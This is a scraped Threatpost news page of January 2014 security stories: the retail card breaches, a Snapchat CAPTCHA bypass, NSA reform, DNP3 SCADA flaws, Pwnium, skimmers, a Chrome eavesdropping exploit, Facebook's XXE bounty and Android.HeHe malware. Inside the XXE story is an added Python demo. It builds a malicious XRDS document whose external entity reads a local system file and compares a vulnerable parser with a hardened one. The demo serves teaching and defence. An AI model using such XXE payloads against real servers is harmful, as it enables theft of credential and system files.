Threatpost for B2B
Officials at Michaels, the large craft and home goods retailer, are investigating a potential data breach that has apparently affected an unknown number of cards used in the chain’s stores in the last few weeks. The company has released very little detail about the compromise but said that it is still investigating the incident.
The apparent intrusion at Michaels is the latest in a string of data breaches at large retailers in the last few months, a run that started with the attack on Target in the fall that compromised financial and personal information of as many as 110 million customers. That breach reportedly involves malware being installed on point-of-sale devices in a number of the company’s stores. There also was an intrusion at Neiman Marcus around the same time, beginning in July and lasting through October and resulting in the compromise of data belonging to 1.1 million people.
The scope of the Michaels breach is unknown at this point, and company officials said they’re still not sure whether the attack was on their network or somewhere else in the payment ecosystem.
“We are concerned there may have been a data security attack on Michaels that may have affected our customers’ payment card information and we are taking aggressive action to determine the nature and scope of the issue,” said Chuck Rubin, CEO of Michaels. “While we have not confirmed a compromise to our systems, we believe it is in the best interest of our customers to alert them to this potential issue so they can take steps to protect themselves, for example, by reviewing their payment card account statements for unauthorized charges.”
“Throughout our 40-year history, our customers have always been our number one priority and we deeply regret any inconvenience this may cause. The privacy and security of our customers’ information is of critical importance to us and we are focused on addressing this issue.”
Retailers always have been a prime target for attackers, thanks to their huge databases of customer information and payment-card data. There has been a push in the security industry to shore up the security of retailers’ networks, especially focusing on the use of encryption. But attackers have been able to find ways around these obstacles. One of the interesting aspects of the Target data breach that has attracted a lot of attention is the attackers’ use of malware known as BlackPOS that has the ability to grab payment data from the POS terminals just before it’s encrypted. That capability defeats the protection that end-to-end encryption is meant to offer, allowing attackers to circumvent one of the key defenses retailers employ.
Dennis Fisher and Mike Mimoso talk about the big security stories of the last couple of weeks, including the developments in the Target data breach, the president’s speech on NSA surveillance reforms and SCADA security woes.
http://threatpost.com/files/2014/01/digital_underground_142.mp3
It was only going to be a matter of time before someone figured out a way past Snapchat’s new CAPTCHA verification method. Just one day after the photo sharing application announced its latest security measure, one researcher claimed Wednesday that he was able to hack it with as few as 100 lines of C++ code.
Steven Hickson, a computer engineering grad from Clemson University, wrote on his personal blog this week that it only took him about 30 minutes to come up with a way around the company’s new people verification system and that it works “with 100 percent accuracy.”
The system is based on identifying a series of nine illustrations; some contain a white ghost, the app’s mascot, and some don’t. To make sure a new user is human, Snapchat has the user click on whichever of the boxes contain a ghost.
“This is an incredibly bad way to verify someone is a person because it is such an easy problem for a computer to solve,” Hickson wrote on his Computer Vision Blog Wednesday.
Hickson used OpenCV (Open Source Computer Vision Library), an open source library initially developed by Intel, and a segmentation method known as simple thresholding to get his computer on the right track. OpenCV assists in “real-time computer vision,” and thresholding helps the computer separate the pixels you’re interested in from the rest of them.
Hickson also used algorithms like SURF, an interest point detector and descriptor, and FLANN, a library for fast approximate nearest neighbor searches, to perform a “uniqueness test to determine that multiple keypoints in the training image weren’t being singularly matched in the testing image.”
Basically Hickson gave his computer an idea of what the Snapchat ghost looks like and it went to work, searching for corresponding points in Snapchat’s puzzle and matching ghosts to ghosts.
“With very little effort, my code was able to ‘find the ghost’ in the above example with 100% accuracy,” Hickson said, calling what he did “one of the easier tasks in computer vision.”
Hickson, who posted the code he used on Github, mentions there are several different ways he could have gone about his experiment. Histogram of Oriented Gradients, or HOG, is another feature-description technique used for object detection that lets computers see the world, so to speak.
It’s another security misstep by the much-buzzed about Snapchat.
Late last year researchers divulged the details regarding two privacy bugs in the application’s ‘Find Friends’ functionality that hackers quickly used to leak 4.6 million of the service’s usernames and partial phone numbers. The hackers started a site, SnapchatDB.info, to host the information but that site has since been taken down.
The new verification system was the latest move by the company to shore up the app’s security.
Just a few weeks ago the company apologized for its error and pushed out a new update of the app that requires users to verify their phone number before using the ‘Find Friends’ feature and gives users the ability to opt out of linking their phone numbers with their usernames.
Perhaps the biggest condemnation of President Obama’s address last Friday announcing reforms to the NSA’s surveillance programs was his failure to mention any of the agency’s alleged involvement in subverting cryptography standards and the impact that has had on the trustworthiness of products built on those baselines.
A long list of the nation’s top cryptographers and security influencers took a stand today against the government’s surveillance activities and subversion of security technology via an open letter. The experts condemn the intelligence community’s practices and point out that tampering with crypto standards via the insertion of backdoors and the tapping of commercial links between data centers belonging to large Internet providers not only damages the privacy and civil liberties of Americans, but opens the door for malicious hackers—criminal and nation-state—to exploit the same holes used by the NSA.
“Indiscriminate collection, storage, and processing of unprecedented amounts of personal information chill free speech and invite many types of abuse, ranging from mission creep to identity theft,” the experts wrote in the letter. “These are not hypothetical problems; they have occurred many times in the past.”
The co-signers of the letter include some security and computing legends such as Steve Bellovin, Niels Ferguson, Ed Felten, Ron Rivest, Bruce Schneier and dozens of others. The letter calls on the government to be transparent about its activities and to “resist the deployment of mass surveillance programs in advance of sound technical and social controls.” The experts also lent their endorsement to a movement called Reform Government Surveillance, which was unwrapped in December.
A group of eight technology giants, including Facebook, Apple and Google, make up the Reform Government Surveillance coalition, which proposed five principles in an open letter of its own to Obama.
Those principles start with limits on the government’s ability to compel service providers to disclose user data and an end to bulk collection of Internet communication. The group also calls for intelligence agencies to operate under a clear, transparent legal framework that includes independent reviewing courts, which is currently not the case with the Foreign Intelligence Surveillance Court. The group asks the government to allow data to cross borders without having to worry about legal loopholes that enable governments to access data stored outside the country. It also asks that governments work together to avoid conflicting laws and develop transparent legal frameworks under which governments agree to operate when it comes to requests for user data.
“The choice is not whether to allow the NSA to spy. The choice is between a communications infrastructure that is vulnerable to attack at its core and one that, by default, is intrinsically secure for its users,” the letter said. “Every country, including our own, must give intelligence and law-enforcement authorities the means to pursue terrorists and criminals, but we can do so without fundamentally undermining the security that enables commerce, entertainment, personal communication, and other aspects of 21st-century life.”
Obama’s speech last week called for immediate and long-term reforms to the NSA’s bulk collection of phone call metadata. The program would end as it exists today, but the president stopped short of ending the agency’s collection of data, which it says it uses to map connections between foreigners thought to be involved in terrorism. The dragnet, however, also sweeps up communications to and from Americans who are not terror suspects, something that has outraged privacy advocates.
A class of SCADA vulnerabilities discussed at a recent conference is getting attention not only for the risks it poses to master control systems at electric utilities, but also for illuminating a dangerous gap in important critical infrastructure regulations.
Researchers Adam Crain and Chris Sistrunk demonstrated several weaknesses in vendor implementations of the DNP3 communication protocol in a number of products during the S4 Conference last week. The flaws, many of which have been patched, demonstrate how an attacker could target a non-critical, serial-based piece of field equipment at an electrical substation and knock out visibility over all of a utility’s substations. The vulnerabilities in some DNP3 implementations could allow attacks against master control systems from a field device by sending a malicious frame, or message, to the control system.
“What’s different about our research is that most have focused on actual field devices—devices in substations or devices on poles—and 50 percent of our testing was on the master systems, things that communicate to all of the field devices and bring that data back to the operations center,” Crain said. “The difference is, if you had access, here you could knock out visibility to a whole system, hundreds of substations, by affecting one or two servers that are monitoring all of that.”
An attacker would need to be targeting a particular utility and gain physical access to a substation in order to drop code on a serial-based field device. While regulations spelled out by the North American Electric Reliability Corp. (NERC) cover TCP/IP communication between devices, the same isn’t true for serial-based communication.
“Where serial lines come into a master station, for instance, they won’t have the same level of protection that a TCP/IP-based connection would have,” said Michael Toecker, an ICS security consultant and engineer at Digital Bond. “There’s a complete regulatory blind spot there in the current version of the NERC standards.”
Toecker said the current NERC standards were developed shortly after the 2003 blackout in parts of the United States and they haven’t been updated according to new threats and vulnerabilities since their full implementation in the 2006 timeframe. And until the Stuxnet attack in 2010, Toecker said, there had been a relative quiet period around electric utility security. Stuxnet, however, has sparked a renewed interest in critical infrastructure cybersecurity.
“I think Stuxnet proved that: 1) there was a case for going after industrial control systems; 2) there was an impact in going after industrial control systems; and 3) showed that the devices and protocols were a valid target,” Toecker said. “And that caused interest in the security research community and they found this place is rife with vulnerabilities, low-hanging fruit.”
Crain and Sistrunk hope their research, which stems from a fuzzing tool developed by Crain called Project Robus, will spark a renewed interest in updating this part of the NERC standards. Plenty of work has been done investigating SCADA and ICS vulnerabilities, including Project SHINE, which is an enumeration of vulnerable control system equipment exposed online and reachable using the Shodan search engine. Those projects, however, don’t necessarily focus on master control systems; rather, they concentrate on smaller field devices that could have a Web-enabled interface protected with just a default or weak credential.
Some of the non-critical devices Crain and Sistrunk talked about at S4 rely largely on physical security to keep them safe, and are not covered by NERC regulations. Initiatives such as the Smart Grid are all about pushing intelligence away from substations and into areas where it may not be practical to have adequate physical security.
“No camera. No fence. Just a lock pick away from somebody getting at that cabinet and then affecting visibility for a huge subset of the distribution system,” Crain said.
DNP3 is the primary SCADA protocol used for electricity distribution in North America, Crain said. The majority of electric utilities use the protocol for some portion of their SCADA infrastructure, both to pull measurements from field devices and to send controls to the field, he said.
“As far as the digital controls on critical assets that communicate to random substations, if it’s done over IP, there’s capability there to put in place protections, things like deep packet inspection,” Toecker said. “The problem exists on the serial side; I’ve yet to see any technology that looks directly at the bare serial protocol and looks for these types of events. There are ways to re-architect systems to look at these things, I’m not sure everyone’s done it.”
Crain and Sistrunk’s research has resulted in 15 advisories being issued by the ICS-CERT, all around DNP3 and all found using Crain’s Project Robus fuzzer. The fuzzer will be released as open source, Crain said, and will soon also be able to test protocols beyond DNP3.
“We have not found anything that would suggest there is anything wrong with the specification,” Crain said. “These are all bugs in implementations from various vendors. There were two vendors we tested out of the 30 products where we didn’t find any detectable vulnerabilities. So at this point, it’s possible to implement the standard without a security or robustness defect.”
In the meantime, Toecker said the industry is still in the beginning stages of creating a standard for serial-based network security for electric utilities. NERC, Toecker said, takes its direction from the Federal Energy Regulatory Commission (FERC), which has mandated discussions on the topic, but a new set of regulations could be as far as a year away.
“We’re in the very beginning stages of addressing these concerns from FERC,” Toecker said. “Stay tuned.”
The attackers who penetrated the Neiman Marcus network last year were on the network for at least three months and made off with credit and debit card data belonging to 1.1 million customers. The company said that the data breach was the result of a compromise that began in mid-July and ran until the end of October.
A company statement said that Visa, MasterCard and Discover cards were affected, including debit cards, and that at least 2,400 cards have been used fraudulently at this point.
“While the forensic and criminal investigations are ongoing, we know that malicious software (malware) was clandestinely installed on our system. It appears that the malware actively collected or ‘scraped’ credit card data from July 16, 2013 to October 30, 2013. During those months, approximately 1,100,000 customer payment cards could have potentially been visible to the malware. To date, Visa, MasterCard and Discover have notified us that approximately 2,400 unique customer payment cards used at Neiman Marcus and Last Call stores were subsequently used fraudulently,” the statement said.
The Neiman Marcus breach is about one-hundredth the magnitude of the Target data breach in terms of the number of cards that were affected, but signs point to similar attack vectors. Target officials have confirmed that malware was found on the company’s point-of-sale systems and the attackers were able to scrape card and PIN data from the terminals just before it was encrypted. Security researchers have said that the malware used in the Target attack appears to be a variant of the BlackPOS malware.
Neiman Marcus did not say specifically that POS malware was used in the intrusion on its network, but its statement points to a similar attack methodology. In an FAQ, the company said “Your PIN was never at risk because we do not use PIN pads in our stores.”
The company said that it is working with law enforcement and a forensics firm to investigate the intrusion on its network.
“We informed federal law enforcement agencies and began working actively with the U.S. Secret Service, the payment brands, our merchant processor, a leading investigations, intelligence and risk management firm, and a leading payment brand-approved forensics firm to investigate the situation. On January 1st, the forensics firm discovered evidence that the company was the victim of a criminal cyber-security intrusion and that some customers’ cards were possibly compromised as a result. At this time, the malicious software we have found has been disabled,” the statement said.
Building on the success of the last couple of years, Google plans to offer more than $2.7 million in potential rewards in the next iteration of its Pwnium hacking competition at this year’s CanSecWest conference in Vancouver. The company has run the contest in parallel with the older Pwn2Own competition at the conference, with somewhat different rules, and this year plans to allow researchers to go after Chrome OS running on both ARM- and Intel-based Chromebooks.
Pwnium began as Google’s answer to Pwn2Own, the well-known hacking contest that has attracted some of the top researchers in the industry over the course of the last few years, including Dino Dai Zovi, Charlie Miller, Chaouki Bekrar and the Vupen team, and many others. Pwn2Own has traditionally not required contestants to submit complete exploit information, but rather the details of the vulnerability and the crash data. Pwnium requires researchers to submit full exploits, something that has kept some of the potential contestants away, notably the Vupen team.
But the money that Google is putting up for new compromises of Chrome OS is far beyond what’s available at Pwn2Own or any of the other major contests and has attracted a small, but elite, group of contestants in past years. The company is promising rewards of as much as $150,000 plus some bonuses, paid at Google’s discretion, for especially innovative or serious exploits.
“New this year, we will also consider significant bonuses for demonstrating a particularly impressive or surprising exploit. Potential examples include defeating kASLR, exploiting memory corruption in the 64-bit browser process or exploiting the kernel directly from a renderer process,” Google security engineer Jorge Lucángeli Obes said.
“Past Pwnium competitions have focused on Intel-based Chrome OS devices, but this year researchers can choose between an ARM-based Chromebook, the HP Chromebook 11 (WiFi), or the Acer C720 Chromebook (2GB WiFi) that is based on the Intel Haswell microarchitecture. The attack must be demonstrated against one of these devices running the then-current stable version of Chrome OS.”
The rules of the Pwnium contest dictate that contestants will have to register in advance and hand over full exploit details, along with information on each individual vulnerability used in the attack. None of the bugs used can be previously known, and the exploits have to be launched from an HTTPS Google App Engine URL.
“Any software included with the default installation may be used as part of the attack. For those without access to a physical device, the Chromium OS developer’s guide offers assistance on getting up and running inside a virtual machine, but note that a virtual environment might differ from the physical devices where the attack must be demonstrated,” Obes said.
Another independent review board investigating the National Security Agency’s collection of phone records metadata has come down hard on the program, calling it illegal, recommending the government end the program, and questioning its effectiveness in ferreting out terrorists.
The Privacy and Civil Liberties Oversight Board released a 238-page document today that examines the program as authorized by Section 215 of the PATRIOT Act. It concluded that the program “lacks a viable legal foundation under Section 215” and determined that the collection of phone records has not made a difference in the outcome of a single counterterrorism investigation.
“We are aware of no instance in which the program directly contributed to the discovery of a previously unknown terrorist plot or the disruption of a terrorist attack,” the report said. “And we believe that in only one instance over the past seven years has the program arguably contributed to the identification of an unknown terrorism suspect.”
The board said the NSA’s program poses serious implications for the privacy and civil liberties of Americans caught up in the dragnet of surveillance activity that is by law supposed to be limited to foreign targets. The board’s report concludes that call data can reveal intimate details about an individual and when that data is digitally analyzed, that person’s privacy is imperiled.
“When the government collects all of a person’s telephone records, storing them for five years in a government database that is subject to high-speed digital searching and analysis, the privacy implications go far beyond what can be revealed by the metadata of a single telephone call,” the report said.
The board also concluded that the NSA’s surveillance activities jeopardize the work of activists, journalists and others who need to protect the sensitivity of their communication. The program has a “chilling effect” on free speech, the report said, and forces those involved in sensitive areas to have less confidence in those relationships.
This is the second time a review board has ruled against the viability of the NSA’s metadata collection activity. In December, a presidentially appointed five-member panel made close to 50 recommendations to President Barack Obama to reform the intelligence community’s surveillance programs, in addition to a number of organizational NSA reforms.
“Now two independent government panels, a bipartisan coalition in Congress, a federal judge sitting in open court, and the majority of the American public agree—the government’s bulk collection of Americans’ private phone records must end,” said Nate Cardozo, a staff attorney with the Electronic Frontier Foundation in a statement.
The PCLOB is an independent committee that operates within the Executive Branch; it was established as a recommendation coming out of the 9/11 Commission Act of 2007 and includes four part-time members and a full-time chairman. The board is appointed by the president and confirmed by the Senate and has two missions: protect the U.S. from terrorism, balancing that protection with the maintenance of privacy and civil liberties; and ensure that privacy is considered when new laws are developed that are related to terrorism.
Today’s report comes less than a week after President Obama announced limited reforms to the metadata collection program, reforms that allow the program to continue.
Obama ordered immediate changes that include pursuing calls two steps removed from a terror suspect rather than three steps, as is the current procedure. Also, he ordered Attorney General Eric Holder to work with the secret Foreign Intelligence Surveillance Court (FISC) so that during this transition period, the database storing phone call metadata can be queried only after a judicial finding or in an emergency.
He also called for increased oversight of the program, annual reviews on the declassification of Foreign Intelligence Surveillance Court opinions with privacy implications, and for the establishment of a panel of outside privacy experts to render opinions on cases before FISC hears them.
“The board’s other recommendations—increasing transparency and changing the FISA court in important ways—similarly reflect a nearly universal consensus that significant reform is needed,” said EFF Staff Attorney Mark Rumold.
Thirteen men were indicted this week for allegedly using Bluetooth-enabled skimmers to steal more than $2 million from customers at gas stations across the Southern United States between 2012 and 2013.
Documents released on Tuesday by the offices of Manhattan District Attorney Cyrus R. Vance, Jr. claim that the four lead defendants attached small skimming devices to gas pumps at Raceway and RaceTrac stations in Texas, Georgia and South Carolina to steal credit card information.
Skimmers are devices criminals can clandestinely affix to the front of ATMs to glean credit and debit card information, along with corresponding PIN data, without customers’ knowledge.
Skimmers can come in many forms: card readers can be attached to the front of an ATM’s credit card slot, and in some cases a keylogger can be laid over the ATM’s PIN pad to monitor users’ passcodes. In this case, the devices were implanted internally, making them practically invisible to drivers while pumping gas.
The devices were also Bluetooth-enabled, so the men didn’t have to physically remove them to get user information; they could simply download the stolen card and PIN numbers wirelessly while doing something as mundane as filling their tank.
From March 26, 2012 to March 28, 2013 the defendants transferred the information to bogus cards and made a series of withdrawals and deposits to specialized bank accounts – 70 in total – across Manhattan. As part of the ruse, some of the men withdrew money at banks in Nevada and California as well, according to documents.
According to the DA, while approximately $2.1 million was stolen and subsequently laundered, the defendants kept each of their transactions under $10,000 so as not to raise suspicions and to “avoid any cash transaction reporting requirements imposed by law.”
Four men, Garegin Spartalyan, Aram Martirosian, Hayk Dzhandzhapanyan and Davit Kudugulyan, are the lead defendants in the case. The men were arrested last March and are now being charged with a slew of crimes, 426 counts in all, including money laundering, criminal possession of stolen property and grand larceny, just to name a few. Nine other men are also being charged in the case with felony counts of money laundering in either the second or third degree.
Skimmers and the cybercrime rings that use them have grown more advanced in recent years. If ATM users suspect a machine has been compromised, it’s usually best practice to give the credit card slot a shake, as the devices are usually attached to the outside of the machine. In this case the skimmers were internal, meaning there was no way for the customers at the gas stations to know they were vulnerable.
A skimming ring extracted $200,000 from patrons at Wrigley Field in Chicago in 2012. In that case, service employees at Wrigley who were in on the scam swiped victims’ cards using a small reader. Elsewhere, a separate ring in 2010 was found to have planted skimmers with custom-made credit card slots at 200 gas pumps across Utah.
The National Cybersecurity and Critical Infrastructure Protection Act of 2013 would amend the Homeland Security Act of 2002 to better protect the country against potentially destructive cyber attacks targeting national utilities and other critical infrastructure systems.
The House Subcommittee on Cybersecurity, Infrastructure Protection, and Security Technologies has marked up and passed the bill back to the House Committee on Homeland Security. From here, H.R. 3696 will travel to the House floor for debate and an eventual vote. Should it pass in the House, it will proceed to the Senate and eventually the Oval Office.
Outside the Capitol, the American Civil Liberties Union, American Chemistry Council, Boeing Company, and National Defense Industrial Association are among the long list of strange bedfellows expressing support for the pending legislation.
In general, the bill seeks to establish a threat-information-sharing partnership between the Department of Homeland Security and the owners and operators of the nation’s critical infrastructure systems. It also establishes a framework through which the DHS can work with international partners to harden the security of systems outside the U.S. but upon which American citizens depend.
More specifically, the bill calls on the Secretary of Homeland Security to facilitate efforts to fortify and maintain a secure, functioning, and resilient critical infrastructure. Part of his responsibility will be to ensure that the handlers of infrastructure receive actionable, industry-specific cyber threat intelligence in real time.
The bill – should it become law – will also call on the secretary to work with private partners to help develop and allocate funds for voluntary security and resiliency strategies. Should an attack occur, the bill would require the DHS to assist in incident response-related activities should critical infrastructure companies request such help.
The bill also opens an avenue through which infrastructure handlers can request help from the government in finding and mitigating threats and vulnerabilities. The secretary would also be required to provide more general security educational training to handlers upon request.
Beyond these requirements and the technical minutiae that fill out the rest of the bill’s text, the bill mandates that the DHS educate the broader public on the importance of securing information systems.
“H.R. 3696 strengthens our cyber defenses by bolstering and providing oversight of DHS’s cybersecurity mission, fostering collaborative public-private partnerships, while also ensuring privacy and civil liberties are protected,” the bill’s sponsors wrote. “We are greatly encouraged by the strong bipartisan support of the NCCIP Act, as well as the many endorsements it has received from both industry and privacy advocates, and we look forward to moving this legislation to the House floor.”
To that end, the ACLU read the bill and gave it its stamp of approval, stating that “information sharing provisions in this bill do not undermine current privacy laws.”
The ACLU endorsed the bill further:
“Unlike H.R. 624, the Cyber Intelligence Sharing and Protection Act (CISPA), your bill does not create broad exceptions to the privacy laws for cybersecurity. Instead, it strengthens private-public partnerships by supporting existing Information Sharing and Analysis Centers and Sector Coordinating Councils and reinforces voluntary sharing under current statutes that already provide for many cybersecurity scenarios.”
In a letter expressing its support for the bill, the Boeing Company noted that it is constantly challenged cyber attacks that are increasing both in number and sophistication. H.R. 3696, a company spokesperson wrote, will strengthen and focus efforts as the government works in partnership with the private sector to increase defensive capabilities.
The subcommittee has also published a one-page explainer that broadly outlines the terms and scope of the bill.
The code disclosure, developer Tal Ater of Israel said, is in response to Google’s decision not to release a patch for the vulnerability after acknowledging to him that it was a problem.
Ater wrote in a post on his personal website that he reported the issue to Google on Sept. 13 and that 11 days later the company informed him a patch was ready; he soon learned he was also eligible for a $30,000 bounty from the Chromium Reward Panel.
More than a month later, however, Ater said Google had yet to release the patch and told him that the issue was mired in discussions with the W3C standards body. The W3C updated its Web Speech API Specification in November, and indications are that the behavior may be in line with the standard.
“The security of our users is a top priority, and this feature was designed with security and privacy in mind,” a Google spokesperson said via email.
In a demo video, Ater’s exploit begins with a Chrome user engaging with a malicious website through the browser’s speech recognition capabilities. The exploit depends on the user giving the website permission to use the microphone. The site developed for the demo is a to-do list app, and once the user is done interacting with the list, the command is given to shut off the microphone. Chrome’s flashing red dot in the browser tab disappears, leading the user to think speech recognition is off.
But the exploit proves just the opposite is true.
“As long as Chrome is running, nothing that is said next to your computer is private,” the demo said.
As the demo continues, the user closes the site authorized to use speech recognition and moves on to another website. Nothing indicates that audio is being recorded, but the browser is still listening, Ater said.
A hidden pop-under, disguised as a banner advertisement, is then revealed: it is capturing the audio and sending it to Google’s speech service, where it is automatically transcribed and the text is returned to the malicious site, Ater said. In the current version of Chrome, however, Google has fixed the code and now forces pop-under ads to appear on top of the window being viewed.
“What you see here essentially turns Google Chrome into an espionage tool,” the demo said. “It compromises your privacy in your office or your home, even when you’re not using the computer. Anything said within earshot of your computer can be captured by malicious parties.”
Ater said the exploit can be programmed to stay dormant and activate only when certain keywords are spoken. He also said that while most sites that use speech recognition do so over HTTPS, Chrome will still remember that a user granted the site permission to use the microphone and allow it to start listening again the next time the user visits. With Ater’s exploit, the indicator in Chrome will not flash and the user will not know they are being eavesdropped on.
“When you click the button to start or stop the speech recognition on the site, what you won’t notice is that the site may have also opened another hidden pop under window. This window can wait until the main site is closed, and then start listening in without asking for permission,” Ater wrote on his site. “This can be done in a window that you never saw, never interacted with, and probably didn’t even know was there. To make matters worse, even if you do notice that window (which can be disguised as a common banner), Chrome does not show any visual indication that speech recognition is turned on in such windows – only in regular Chrome tabs.”
Remote code execution bugs are the gold nuggets of security research. They’re the ones that researchers stay up all night looking for and they’re the kind of vulnerabilities that often are worth big money, whether it’s from a vulnerability broker, a government agency or a bug bounty program. For Reginaldo Silva, when he came across a serious vulnerability in the OpenID module in Drupal, he wasn’t sure right away exactly what he had or how valuable it was, so he reported it and later received a $500 bounty from Google, which uses OpenID. Only later did he realize it might have a much broader impact, and that’s how he ended up with a much, much bigger bounty from Facebook.
Silva, a computer engineer from Brazil, said he was messing around with Drupal back in September 2012 and ended up discovering a problem with the way Drupal handled OpenID. The vulnerability was an XML external entity expansion bug that allowed an attacker to read any file on a filesystem and take some other malicious actions. He reported the bug and it went into the CVE system, but a few days later he started thinking about how widely used OpenID is. He tested some Google properties and found that AppEngine and Blogger were both vulnerable and got a $500 bounty for his trouble.
But Silva kept looking around and remembered that Facebook allowed OpenID logins, but couldn’t find a way to enter an arbitrary OpenID URL, so he figured the site wasn’t vulnerable.
“So for more than a year I thought Facebook was not vulnerable at all, until one day I was testing Facebook’s Forgot your password? functionality and saw a request to https://www.facebook.com/openid/receiver.php,” Silva wrote in a blog post explaining his find.
“That’s when I began to suspect that Facebook was indeed vulnerable to that same XXE I had found out more than a year ago. I had to work a lot to confirm this suspicion, though. Long story short, when you forget your password, one of the ways you can prove to Facebook that you own an @gmail.com account is to log into your Gmail and authorize Facebook to get your basic information (such as email and name). The way this works is you’re actually logging into Facebook using your Gmail account, and this login happens over OpenID. So far, so good, but this is where I got stuck. I knew that, for my bug to work, the OpenID Relying Party (RP – Facebook) has to make a Yadis discovery request to an OpenID Provider (OP) under the attacker’s control. Let’s say http://www.ubercomp.com/. Then my malicious OP will send a response with the rogue XML that will then be parsed by the RP, and the XXE attack will work.”
Silva continued working on the Facebook login and eventually found a way to trigger the bug. But he couldn’t find a way to read any files on the vulnerable system, until he realized he had a small bug in his own code. Once he fixed that, he was in the clear.
“That’s right, the response contained Facebook’s /etc/passwd. Now we were going somewhere. By then I knew I had found the keys to the kingdom. After all, having the ability to read (almost) any file and open arbitrary network connections through the point of view of the Facebook server, and which doesn’t go through any kind of proxy was surely something Facebook wanted to avoid at any cost,” he wrote.
Silva wanted to escalate the bug to a remote code execution vulnerability, though, and kept working on the problem. However, he also wanted to make sure he played by the rules of Facebook’s bug bounty program, so he reported the XXE flaw and asked for permission to continue working on elevating it to a RCE flaw. That initial report sent the Facebook security team into full-on quick response mode immediately.
“In November, we were reading through incoming bug reports and came across a claim we wanted to investigate right away: arbitrary file reads. The report was well written and included proof of concept code, so we were able to reproduce the issue easily. After running the proof of concept to verify the issue, we filed an urgent task—triggering notifications to our on-call employees,” the Facebook security team explained in its account of the incident.
The team implemented a short-term fix in one line of code immediately and then set about trying to figure out how to push it to all of its Web servers. Once that was handled, the team looked for any associated issues and tried to determine whether there was a better long-term patch.
“After debugging, we concluded that libxml_disable_entity_loader(true) was indeed the correct final fix. Because we want to leave the code in a better state than we found it (rewrite old code, write tests, etc), writing the long term fix is often the step in the lifecycle of a bug that takes the longest. We wanted this line to run before anything else, so we put it in the lowest level of the callstack in our request initialization code,” Facebook said.
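The attack Silva describes and the fix Facebook settled on, as an added example that is neither Silva’s proof of concept nor Facebook’s code: a malicious OpenID Provider answers the relying party’s Yadis discovery request with an XRDS document whose DTD declares an external entity pointing at a file on the relying party’s disk. The example uses Python’s xml.sax in place of PHP’s libxml so that it runs offline; the `feature_external_ges` flag plays the role of `libxml_disable_entity_loader(true)`. The XRDS content, the temporary file standing in for /etc/passwd and the function names are constructed for the demo.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


def make_malicious_xrds(secret_path):
    """Yadis/XRDS discovery response from an attacker-controlled OpenID
    Provider (constructed). The internal DTD subset declares an external
    entity whose system identifier is a file on the Relying Party's disk;
    the reference inside <URI> makes a vulnerable parser read that file
    into the document, where the RP's own code then sees it."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE xrds [\n'
        '  <!ENTITY xxe SYSTEM "' + secret_path + '">\n'
        ']>\n'
        '<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">\n'
        '  <XRD>\n'
        '    <Service priority="0">\n'
        '      <Type>http://specs.openid.net/auth/2.0/server</Type>\n'
        '      <URI>&xxe;</URI>\n'
        '    </Service>\n'
        '  </XRD>\n'
        '</xrds:XRDS>\n'
    )


class UriCollector(ContentHandler):
    """Minimal relying-party handler: collects the text of every <URI>,
    which is where discovery finds the OP endpoint to talk to."""

    def __init__(self):
        super().__init__()
        self.uris = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "URI":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "URI":
            self.uris.append("".join(self._buf).strip())
            self._buf = None


def discover_endpoints(xrds, resolve_external_entities):
    """Parse an XRDS document and return the OP endpoint URIs it lists.

    resolve_external_entities=True mirrors a libxml configuration that loads
    external entities (the vulnerable state Silva found); False mirrors the
    effect of libxml_disable_entity_loader(true)."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = UriCollector()
    parser.setContentHandler(handler)
    parser.parse(io.StringIO(xrds))
    return handler.uris


def demo():
    """Run the same malicious XRDS through the vulnerable and the hardened
    parser; returns (uris_from_vulnerable_parser, uris_from_hardened_parser)."""
    # Constructed stand-in for /etc/passwd; the attacker only ever sees it
    # through the parser's output.
    secret = "root:x:0:0:root:/root:/bin/bash"
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(secret)
        secret_path = f.name
    try:
        xrds = make_malicious_xrds(secret_path)
        leaked = discover_endpoints(xrds, resolve_external_entities=True)
        safe = discover_endpoints(xrds, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:", leaked)
    print("hardened parser returned:  ", safe)
```

With entity loading enabled the URI list contains the secret file’s contents; with it disabled the entity reference expands to nothing and the list holds an empty string. The defensive rule is the one Facebook applied: disable external entity loading before any request-handling code runs, rather than trusting each caller to remember it.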
While this was happening, Silva was at lunch thinking about what he would do to escalate the vulnerability to RCE. When he returned, he discovered that Facebook already had implemented its fix.
“Needless to say, I was very impressed and disappointed at the same time, but since I knew just how I would escalate that attack to a Remote Code Execution bug, I decided to tell the security team what I’d do to escalate my access and trust them to be honest when they tested to see if the attack I had in my mind worked or not. I’m glad I did that. After a few back and forth emails, the security team confirmed that my attack was sound and that I had indeed found a RCE affecting their servers,” Silva said.
The Facebook security team realized the severity of the flaw and was considering a major bounty for Silva. They settled on a formula that averaged the recommended bounties from several of the company’s program administrators and came up with the final figure: $33,500. That’s one of the higher bounties paid by any of the major vulnerability reward programs, outside of the special bounties that Google sometimes pays in its Pwnium contest or Microsoft pays for mitigation bypasses.
“Plus, and more importantly, I get to brag I broke into Facebook… Nice, huh?” Silva said.
A new strain of Android malware has been spotted that masquerades as an Android security app but once installed, can steal text messages and intercept phone calls without the device’s owner being any the wiser.
Dubbed Android.HeHe, the malware has six variants according to a blog post yesterday by Hitesh Dharmdasani, a mobile malware researcher with FireEye.
The malware apparently comes disguised as a security update (“Android Security”) for the phone’s operating system. Once installed, it contacts the command-and-control server and monitors incoming SMS messages. The command-and-control server responds with a list of phone numbers that “are of interest to the malware author,” according to Dharmdasani. If one of those numbers sends an SMS or makes a call to a compromised device, the malware intercepts it, suppresses the device’s notification and removes the message from the SMS history.
While text messages are logged and sent to the C&C, phone calls are outright silenced and rejected.
Other information, such as the phone’s International Mobile Equipment Identity (IMEI) number, its phone number, SMS address and channel ID, is also collected, serialized to a JSON string and sent off to the C&C as well.
Further information, such as the phone’s model, operating system version and associated network type (GSM/CDMA), is sent to the C&C in the same fashion.
While the C&C has since gone offline, FireEye researchers were still able to analyze how the server processed responses.
